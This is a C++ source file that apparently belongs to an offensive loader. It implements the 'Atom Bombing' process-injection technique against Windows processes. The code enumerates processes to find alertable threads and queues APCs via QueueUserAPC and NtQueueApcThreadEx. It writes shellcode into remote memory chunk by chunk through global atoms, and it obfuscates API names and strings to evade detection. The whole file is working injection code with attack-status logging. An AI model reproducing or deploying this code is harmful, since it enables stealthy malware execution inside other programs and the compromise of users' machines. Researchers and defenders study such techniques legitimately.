
#include "atombomb.h"

std::map<DWORD, std::set<DWORD>> cachedSystemWideAlertableThreads;

// findAlertableThread implementation based on:
//  https://modexp.wordpress.com/2019/08/27/process-injection-apc/
//

HANDLE findAlertableThread(HANDLE hp, DWORD pid)
{
    return findAlertableThread2(hp, pid).second;
}

std::pair<DWORD, HANDLE> findAlertableThread2(HANDLE hp, DWORD pid)
{
    std::map<DWORD, HANDLE> threads = findAlertableThreads(hp, pid, false);
    if (threads.empty()) return {};

    auto idx = getRandomNumber(static_cast<int>(threads.size()));
    auto tid = map_keys(threads)[idx];

    for (auto &m : threads)
    {
        if (m.first == tid) continue;
        CloseHandle(m.second);
    }
    
    return std::make_pair(tid, threads[tid]);
}

std::map<DWORD, HANDLE> findAlertableThreads(HANDLE hProcess, DWORD pid, bool onlyFirst)
{
    auto cachedPids = map_keys(cachedSystemWideAlertableThreads);
    if (cachedPids.end() != std::find(cachedPids.begin(), cachedPids.end(), pid))
    {
        std::map<DWORD, HANDLE> out;

        for (const auto &tid : cachedSystemWideAlertableThreads[pid])
        {
            HANDLE th = MyOpenThread(THREAD_ALL_ACCESS, FALSE, tid);
            if (th != NULL && th != INVALID_HANDLE_VALUE)
            {
                out[tid] = th;
            }

            if (onlyFirst) break;
        }

        return out;
    }

    return _findAlertableThreads(hProcess, pid, onlyFirst);
}

void atomBombQueueThreadApc(void* address, HANDLE remoteThread, PVOID arg1, bool suspendThread, bool dontCloseHandle)
{
    RESOLVE(kernel32, QueueUserAPC);
    RESOLVE(ntdll, NtResumeThread);
    RESOLVE(ntdll, NtSuspendThread);

    bool suspended = false;
    if (suspendThread)
    {
        _NtSuspendThread(remoteThread, NULL);
        suspended = true;
    }

    DWORD out = _QueueUserAPC(address, remoteThread, reinterpret_cast<ULONG_PTR>(arg1));

    if(suspended) _NtResumeThread(remoteThread, NULL);
    if(!dontCloseHandle) CloseHandle(remoteThread);
}

void atomBombQueueThreadApcEx(void* address, HANDLE remoteThread, PVOID arg1, PVOID arg2, PVOID arg3, bool suspendThread, bool dontCloseHandle)
{
    RESOLVE(ntdll, NtQueueApcThreadEx);
    RESOLVE(ntdll, NtResumeThread);
    RESOLVE(ntdll, NtSuspendThread);

    bool suspended = false;
    if (suspendThread)
    {
        _NtSuspendThread(remoteThread, NULL);
        suspended = true;
    }

    DWORD out = _NtQueueApcThreadEx(remoteThread, nullptr, address, arg1, arg2, arg3);

    if (suspended) _NtResumeThread(remoteThread, NULL);
    if (!dontCloseHandle) CloseHandle(remoteThread);
}

std::map<DWORD, HANDLE> _findAlertableThreads(HANDLE hp, DWORD pid, bool onlyFirst)
{
    DWORD         i, cnt = 0;
    HANDLE        evt[2] = { 0 }, ss = NULL, ht = NULL,
        hl[MAXIMUM_WAIT_OBJECTS] = { 0 },
        sh[MAXIMUM_WAIT_OBJECTS] = { 0 },
        th[MAXIMUM_WAIT_OBJECTS] = { 0 };
    THREADENTRY32 te = { 0 };
    HMODULE       m = NULL;
    LPVOID        f = NULL, rm = NULL;

    DWORD         tids[MAXIMUM_WAIT_OBJECTS] = { 0 };

    std::map<DWORD, HANDLE> threads;

    // 1. Enumerate threads in target process
    RESOLVE(kernel32, CreateToolhelp32Snapshot);
    RESOLVE(kernel32, Thread32First);
    RESOLVE(kernel32, Thread32Next);
    //RESOLVE(kernel32, OpenThread);
    
    ss = _CreateToolhelp32Snapshot(
        TH32CS_SNAPTHREAD, 0);

    if (ss == INVALID_HANDLE_VALUE) return {};

    te.dwSize = sizeof(THREADENTRY32);

    if (_Thread32First(ss, &te)) {
        do {
            // if not our target process, skip it
            if (te.th32OwnerProcessID != pid) continue;
            // if we can't open thread, skip it
            ht = MyOpenThread(
                THREAD_ALL_ACCESS,
                FALSE,
                te.th32ThreadID);

            if (ht == NULL) continue;
            // otherwise, add to list
            tids[cnt] = te.th32ThreadID;
            hl[cnt++] = ht;
            // if we've reached MAXIMUM_WAIT_OBJECTS. break
            if (cnt == MAXIMUM_WAIT_OBJECTS) break;
        } while (_Thread32Next(ss, &te));
    }

    std::map<HANDLE, HANDLE> remoteHandles;

    bool suspendThread = hp != GetCurrentProcess();

    RESOLVE(kernel32, CreateEventW);
    const FARPROC setEvent = ::GetProcAddress(GetModuleHandleW(L"kernel32.dll"), OBFI_ASCII("SetEvent"));
    assert (setEvent != NULL);

    for (i = 0; i < cnt; i++) {
        // 2. create event and duplicate in target process
        sh[i] = _CreateEventW(NULL, FALSE, FALSE, NULL);

        DuplicateHandle(
            GetCurrentProcess(),  // source process
            sh[i],                // source handle to duplicate
            hp,                   // target process
            &th[i],               // target handle
            0,
            FALSE,
            DUPLICATE_SAME_ACCESS);

        // 3. Queue APC for thread passing target event handle
        bool foo = globalQuietOption;
        globalQuietOption = true;
        atomBombQueueThreadApc(setEvent, hl[i], reinterpret_cast<PVOID>(th[i]), suspendThread, true);
        globalQuietOption = foo;

        remoteHandles[hl[i]] = th[i];
    }

    // 4. Wait for events to become signaled
    size_t foobar = 0;
    while (foobar++ < 3)
    {
        i = WaitForMultipleObjects(cnt, sh, FALSE, 2000);
        if (i >= WAIT_OBJECT_0 && i < (WAIT_OBJECT_0 + (cnt)))
        {
            // 5. save thread handles
            threads[tids[i]] = hl[i];

            auto cachedPids = map_keys(cachedSystemWideAlertableThreads);
            if (cachedPids.end() == std::find(cachedPids.begin(), cachedPids.end(), pid))
            {
                cachedSystemWideAlertableThreads[pid] = { tids[i] };
            }

            for (size_t n = 0; n < cnt; n++)
            {
                if (WaitForSingleObject(sh[n], 0) == WAIT_OBJECT_0)
                {
                    threads[tids[n]] = hl[n];
                    cachedSystemWideAlertableThreads[pid].insert(tids[i]);
                }
            }

            break;
        }
    }

    if (threads.empty())
    {
        verbose(OBF(L"[-] Waiting for multiple events in remote process failed. Possibly process terminated prematurely."));
        for (i = 0; i < cnt; i++) {
            CloseHandle(sh[i]);
        }
        return {};
    }

    auto alertableHandles = map_values(threads);

    // 6. Close source + target handles
    for (i = 0; i < cnt; i++) 
    {
        CloseHandle(sh[i]);

        HANDLE _th = th[i];
        auto k = std::find_if(
            std::begin(remoteHandles),
            std::end(remoteHandles),
            [&_th](const std::pair<HANDLE, HANDLE> h1) { return h1.second == _th; }
        );

        if (k != remoteHandles.end())
        {
            bool foo = globalQuietOption;
            globalQuietOption = true;
            atomBombQueueThreadApc(CloseHandle, k->first, th[i], suspendThread, true);
            globalQuietOption = foo;
        }

        if (!alertableHandles.empty() && std::find(alertableHandles.begin(), alertableHandles.end(), hl[i]) == alertableHandles.end())
        {
            CloseHandle(hl[i]);
        }
    }

    CloseHandle(ss);
    return threads;
}

void cleanUnrelatedAtomBombingCandidates(
    std::vector<PROCESS_INFORMATION> candidates,
    const PROCESS_INFORMATION &p
)
{
    bool everything = (p.dwProcessId == 0 && p.dwThreadId == 0 && p.hProcess == nullptr && p.hThread == nullptr);

    std::set<HANDLE> closedProcHandles;
    std::set<HANDLE> closedThreadHandles;

    for (auto &c : candidates)
    {
        bool closeProcHandle = everything;
        bool closeThreadHandle = everything;

        if (!everything)
        {
            if (p.dwProcessId != 0)
            {
                if (c.dwProcessId != 0)
                {
                    closeProcHandle = (p.dwProcessId != c.dwProcessId);
                }
            }

            if (!closeProcHandle && p.hProcess != nullptr && p.hProcess != INVALID_HANDLE_VALUE)
            {
                if (c.hProcess != nullptr && c.hProcess != INVALID_HANDLE_VALUE)
                {
                    closeProcHandle = (p.hProcess != c.hProcess);
                }
            }

            if (p.dwThreadId != 0)
            {
                if (c.dwThreadId != 0)
                {
                    closeThreadHandle = (p.dwThreadId != c.dwThreadId);
                }
            }

            if (!closeThreadHandle && p.hThread != nullptr && p.hThread != INVALID_HANDLE_VALUE)
            {
                if (c.hThread != nullptr && c.hThread != INVALID_HANDLE_VALUE)
                {
                    closeThreadHandle = (p.hThread != c.hThread);
                }
            }
        }

        if (closeProcHandle && (closedProcHandles.end() == std::find(closedProcHandles.begin(), closedProcHandles.end(), c.hProcess)))
        {
            CloseHandle(c.hProcess);
            closedProcHandles.insert(c.hProcess);
            c.hProcess = nullptr;
        }

        if (closeThreadHandle && (closedThreadHandles.end() == std::find(closedThreadHandles.begin(), closedThreadHandles.end(), c.hThread)))
        {
            CloseHandle(c.hThread);
            closedThreadHandles.insert(c.hThread);
            c.hThread = nullptr;
        }
    }
}

std::vector<PROCESS_INFORMATION> findAtomBombingCandidates(
    bool onlyFirst, 
    std::set<DWORD> *constraintedSetOfPids
)
{
    RESOLVE(kernel32, CreateToolhelp32Snapshot);
    RESOLVE(kernel32, Process32FirstW);
    RESOLVE(kernel32, Process32NextW);

    HANDLE ss = _CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (ss == INVALID_HANDLE_VALUE) return {};

    PROCESSENTRY32W pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32W);

    std::vector<PROCESS_INFORMATION> out;
    std::vector<PROCESSENTRY32W> processes;

    if (_Process32FirstW(ss, &pe32)) 
    {
        do 
        {
            if (pe32.th32ProcessID == GetCurrentProcessId()) continue;
            if (constraintedSetOfPids != nullptr && !constraintedSetOfPids->empty())
            {
                auto it = std::find(constraintedSetOfPids->begin(), constraintedSetOfPids->end(), pe32.th32ProcessID);
                if (it == constraintedSetOfPids->end()) continue;
            }

            processes.push_back(pe32);
        } 
        while (_Process32NextW(ss, &pe32));
    }

    shuffle(processes);

    for (auto &pe32 : processes)
    {
        // has to be PROCESS_ALL_ACCESS due to subsequent THREAD_ALL_ACCESS 
        auto p = openRemoteProcess(pe32.th32ProcessID);
        if (p.hProcess == nullptr || p.hProcess == INVALID_HANDLE_VALUE) 
            continue;

        bool cleanup = false;

        if (onlyFirst)
        {
            auto at = findAlertableThread2(p.hProcess, p.dwProcessId);
            if (at.first != 0 && at.second != nullptr && at.second != INVALID_HANDLE_VALUE)
            {
                info(OBF(L"[.] Found alertable thread in process: "), pe32.th32ProcessID, OBF(L" ("),
                    getProcessName(pe32.th32ProcessID), OBF(L"). Will use it for injection."));

                p.dwThreadId = at.first;
                p.hThread = at.second;

                out.push_back(p);
                break;
            }
            else
            {
                cleanup = true;
            }
        }
        else
        {
            auto alertableThreads = findAlertableThreads(p.hProcess, p.dwProcessId, false);
            if (!alertableThreads.empty())
            {
                for (const auto &alert : alertableThreads)
                {
                    auto p2 = p;
                    p2.dwThreadId = alert.first;
                    p2.hThread = alert.second;

                    out.push_back(p2);
                }
            }
            else
            {
                cleanup = true;
            }
        }

        if (cleanup)
        {
            CloseHandle(p.hProcess);
            CloseHandle(p.hThread);

            p.hProcess = p.hThread = nullptr;
        }
    }

    return out;
}

size_t atomBombingInChunks(
    HANDLE alertableThread, 
    uint8_t* targetAddr, 
    uint8_t* payload, 
    size_t offset, 
    size_t payloadSize,
    bool suspendThread
)
{
    if (offset >= payloadSize) return 0;

    RESOLVE(kernel32, GlobalAddAtomA);
    //RESOLVE(kernel32, GlobalGetAtomNameA);

    const ATOM aux = _GlobalAddAtomA("b");
    if (aux == 0)
    {
        info(OBF(L"[-] Could not create an initial global atom. Error: "), GetLastError());
    }

    const FARPROC ptrGlobalGetAtomNameA = ::GetProcAddress(GetModuleHandleW(L"kernel32.dll"), OBFI_ASCII("GlobalGetAtomNameA"));
    assert(ptrGlobalGetAtomNameA != NULL);

    for (DWORD64 pos = payloadSize - 1; pos > 0; pos--)
    {
        if ((payload[pos] == '\0') && (payload[pos - 1] == '\0'))
        {
            atomBombQueueThreadApcEx(
                ptrGlobalGetAtomNameA,
                alertableThread,
                reinterpret_cast<PVOID>(aux),
                reinterpret_cast<PVOID>(reinterpret_cast<uintptr_t>(targetAddr) + offset + pos - 1),
                reinterpret_cast<PVOID>(2),  // will store: 0x62 0x00 | "b\0"
                suspendThread,
                true
            );
        }
    }

    char localBuf[RTL_MAXIMUM_ATOM_LENGTH + 1] = { 0 };
    const size_t chunkSize = ((payloadSize - offset) > RTL_MAXIMUM_ATOM_LENGTH - 1)? RTL_MAXIMUM_ATOM_LENGTH - 1: (payloadSize - offset);

    memcpy(localBuf, &payload[offset], chunkSize);

    for (char* pos = localBuf; pos < &localBuf[chunkSize]; pos += strlen(pos) + 1)
    {
        if (*pos == 0) continue;

        const ATOM a = _GlobalAddAtomA(pos);
        if (a == 0)
        {
            auto err = GetLastError();
            info(OBF(L"[-] Could not add global atom containing the payload. FATAL. Error: "), err);
            return false;
        }

        const DWORD64 localoffset = pos - localBuf;
        if (pos < localBuf)
        {
            info(OBF(L"[!] Something went wrong in global atoms offset computation!"));
            return 0;
        }

        atomBombQueueThreadApcEx(
            ptrGlobalGetAtomNameA,
            alertableThread,
            reinterpret_cast<PVOID>(a),
            reinterpret_cast<PVOID>(reinterpret_cast<uintptr_t>(targetAddr) + offset + localoffset),
            reinterpret_cast<PVOID>(strlen(pos) + 1),
            suspendThread,
            true
        );
    }

    return chunkSize;
}

bool bombTheAtoms(
    PROCESS_INFORMATION *pinfo, 
    uint8_t* targetAddr, 
    uint8_t* payload, 
    size_t payloadSize, 
    DWORD protection, 
    HANDLE *externalAlertableThread
)
{
    PROCESS_INFORMATION pinfoTmp = { 0 };
    if (payload[0] == '\0')
    {
        info(OBF(L"[!] Input shellcode starts with a NULL byte which is not allowed for this technique to work. "));
        return false;
    }

    HANDLE alertableThread = (externalAlertableThread != nullptr)? *externalAlertableThread : NULL;
    if (alertableThread == NULL)
    {
        if (!pinfo)
        {
            auto pinfoTmp = findAtomBombingCandidates(true, nullptr).front();
            pinfo = &pinfoTmp;
        }
        else
        {
            if (!pinfo->hProcess && pinfo->dwProcessId > 0)
            {
                pinfoTmp = openRemoteProcess(pinfo->dwProcessId, true);
                pinfo = &pinfoTmp;
            }
        }
    }

    alertableThread = pinfo->hThread;

    if (pinfo->hProcess == NULL || pinfo->dwProcessId == 0 || alertableThread == NULL)
    {
        info(OBF(L"[!] Could not find a single alertable thread! You will need to select a remote process target known to be waiting for something."));
        info(OBF(L"    This can be for instance: iexplorer.exe, chrome.exe, skype.exe, sihost.exe, WmiPrvSE.exe, etc."));
        return false;
    }

    if (!changeProtection(targetAddr, payloadSize, PAGE_READWRITE, pinfo->hProcess))
    {
        info(OBF(L"[-] Could not change remote payload buffer pages protection!"));
        return false;
    }

    info(OBF(L"[+] Atom Bombing: targeting process with PID = "), pinfo->dwProcessId, OBF(L" ("), 
        getProcessName(pinfo->dwProcessId), OBF(L")"));

    const bool remote = pinfo->hProcess != GetCurrentProcess();
    bool alreadySuspended = false;
    checkIsThreadSuspended(pinfo->dwProcessId, pinfo->dwThreadId, &alreadySuspended);

    if (payloadSize < RTL_MAXIMUM_ATOM_LENGTH - 1)
    {
        if (!atomBombingInChunks(
            alertableThread,
            reinterpret_cast<uint8_t*>(targetAddr),
            payload,
            0,
            payloadSize,
            !alreadySuspended
        ))
        {
            info(OBF(L"[-] Could not launch atom bombing for entire shellcode at once."));
            return false;
        }
    }
    else
    {
        size_t offset = 0;
        size_t sum = 0;
        size_t failures = 0;

        while (offset < payloadSize)
        {
            if (sum >= (payloadSize * 0.01))
            {
                verbose(OBF(L"[.] Atom Bombing in progress. Chunk: "), offset, OBF(L"/"), payloadSize);
                sum = 0;

                bool found = false;
                auto procs = collectRunningProcesses();
                for (auto& proc : procs)
                {
                    if (proc.th32ProcessID == pinfo->dwProcessId)
                    {
                        found = true;
                        break;
                    }
                }

                if (!found)
                {
                    if (failures++ > 3)
                    {
                        info(OBF(L"[!] Target process crashed. Attack failed."));
                        return false;
                    }
                    else
                    {
                        verbose(OBF(L"[-] Attacked process not found, probably it crashed."));
                    }
                }
            }

            size_t next = atomBombingInChunks(
                alertableThread,
                reinterpret_cast<uint8_t*>(targetAddr),
                payload,
                offset,
                payloadSize,
                !alreadySuspended
            );

            if (!next)
            {
                info(OBF(L"[-] Could not launch atom bombing for the "), offset, OBF(L"/"), payloadSize, OBF(L" chunk."));
                return false;
            }

            sum += next;
            offset += next;
        }
    }

    if (!changeProtection(targetAddr, payloadSize, protection, pinfo->hProcess))
    {
        info(OBF(L"[-] Could not change remote payload buffer pages protection!"));
        return false;
    }

    info(OBF(L"[+] Looks like Atom Bombing succeeded. We've got a payload written at: 0x"), std::hex, targetAddr, OBF(L" in remote process!"));
    return true;
}
